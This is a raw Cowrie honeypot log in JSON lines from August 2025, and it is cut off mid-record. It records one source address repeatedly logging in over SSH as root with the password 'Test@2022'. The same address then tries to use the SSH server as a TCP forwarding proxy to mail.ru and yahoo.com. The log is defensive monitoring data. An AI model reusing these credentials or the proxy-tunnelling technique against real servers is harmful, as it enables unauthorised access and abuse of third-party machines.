{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.095880Z","src_ip":"77.83.207.83","session":"2ba52e2ce6a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":13560,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:13560","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.236822Z","session":"2ba52e2ce6a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.287289Z","src_ip":"77.83.207.83","session":"2ba52e2ce6a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":6472,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:6472","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.428885Z","session":"2ba52e2ce6a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.479581Z","src_ip":"77.83.207.83","session":"2ba52e2ce6a1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.531119Z","src_ip":"77.83.207.83","session":"2ba52e2ce6a1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":61937,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c87215c82ec","protocol":"ssh","message":"New connection: 77.83.207.83:61937 (1.2.3.4:22) [session: 3c87215c82ec]","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.579726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.580902Z","src_ip":"77.83.207.83","session":"3c87215c82ec"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.630873Z","src_ip":"77.83.207.83","session":"3c87215c82ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60820,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a579c9a3040","protocol":"ssh","message":"New connection: 212.227.125.160:60820 (1.2.3.4:22) [session: 3a579c9a3040]","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.680409Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.879066Z","src_ip":"77.83.207.83","session":"3c87215c82ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1788,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1788","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.929327Z","session":"3c87215c82ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.979091Z","src_ip":"77.83.207.83","session":"3c87215c82ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24751,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:24751","sensor":"my-vps","timestamp":"2025-08-31T03:47:33.119912Z","session":"3c87215c82ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:33.169692Z","src_ip":"77.83.207.83","session":"3c87215c82ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":24051,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:24051","sensor":"my-vps","timestamp":"2025-08-31T03:47:33.311955Z","session":"3c87215c82ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:33.361749Z","src_ip":"77.83.207.83","session":"3c87215c82ec"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:33.412319Z","src_ip":"77.83.207.83","session":"3c87215c82ec"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":62023,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbb8616d0785","protocol":"ssh","message":"New connection: 77.83.207.83:62023 (1.2.3.4:22) [session: cbb8616d0785]","sensor":"my-vps","timestamp":"2025-08-31T03:47:33.463408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:33.464309Z","src_ip":"77.83.207.83","session":"cbb8616d0785"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:33.516484Z","src_ip":"77.83.207.83","session":"cbb8616d0785"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:33.776288Z","src_ip":"77.83.207.83","session":"cbb8616d0785"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":21402,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:21402","sensor":"my-vps","timestamp":"2025-08-31T03:47:33.829152Z","session":"cbb8616d0785"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:33.881279Z","src_ip":"77.83.207.83","session":"cbb8616d0785"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17242,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:17242","sensor":"my-vps","timestamp":"2025-08-31T03:47:34.026421Z","session":"cbb8616d0785"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:34.078629Z","src_ip":"77.83.207.83","session":"cbb8616d0785"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":5525,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:5525","sensor":"my-vps","timestamp":"2025-08-31T03:47:34.226394Z","session":"cbb8616d0785"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:34.278441Z","src_ip":"77.83.207.83","session":"cbb8616d0785"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:34.331238Z","src_ip":"77.83.207.83","session":"cbb8616d0785"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":62129,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c3ed4ea878a","protocol":"ssh","message":"New connection: 77.83.207.83:62129 (1.2.3.4:22) [session: 3c3ed4ea878a]","sensor":"my-vps","timestamp":"2025-08-31T03:47:34.379875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:34.389867Z","src_ip":"77.83.207.83","session":"3c3ed4ea878a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:34.429729Z","src_ip":"77.83.207.83","session":"3c3ed4ea878a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:34.678023Z","src_ip":"77.83.207.83","session":"3c3ed4ea878a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":13891,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:13891","sensor":"my-vps","timestamp":"2025-08-31T03:47:34.728665Z","session":"3c3ed4ea878a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:34.778572Z","src_ip":"77.83.207.83","session":"3c3ed4ea878a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":22098,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:22098","sensor":"my-vps","timestamp":"2025-08-31T03:47:34.920144Z","session":"3c3ed4ea878a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:34.971481Z","src_ip":"77.83.207.83","session":"3c3ed4ea878a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":23810,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:23810","sensor":"my-vps","timestamp":"2025-08-31T03:47:35.112054Z","session":"3c3ed4ea878a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:35.161914Z","src_ip":"77.83.207.83","session":"3c3ed4ea878a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:35.212454Z","src_ip":"77.83.207.83","session":"3c3ed4ea878a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":62227,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0558abe2980","protocol":"ssh","message":"New connection: 77.83.207.83:62227 (1.2.3.4:22) [session: b0558abe2980]","sensor":"my-vps","timestamp":"2025-08-31T03:47:35.262118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:35.272601Z","src_ip":"77.83.207.83","session":"b0558abe2980"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:35.313425Z","src_ip":"77.83.207.83","session":"b0558abe2980"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:35.567030Z","src_ip":"77.83.207.83","session":"b0558abe2980"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12538,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:12538","sensor":"my-vps","timestamp":"2025-08-31T03:47:35.619455Z","session":"b0558abe2980"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:35.670640Z","src_ip":"77.83.207.83","session":"b0558abe2980"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32554,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32554","sensor":"my-vps","timestamp":"2025-08-31T03:47:35.813007Z","session":"b0558abe2980"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:35.864221Z","src_ip":"77.83.207.83","session":"b0558abe2980"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":5569,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5569","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.009203Z","session":"b0558abe2980"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.059975Z","src_ip":"77.83.207.83","session":"b0558abe2980"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.111492Z","src_ip":"77.83.207.83","session":"b0558abe2980"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":62301,"dst_ip":"1.2.3.4","dst_port":22,"session":"c56e3bbe74bd","protocol":"ssh","message":"New connection: 77.83.207.83:62301 (1.2.3.4:22) [session: c56e3bbe74bd]","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.160490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.161229Z","src_ip":"77.83.207.83","session":"c56e3bbe74bd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rs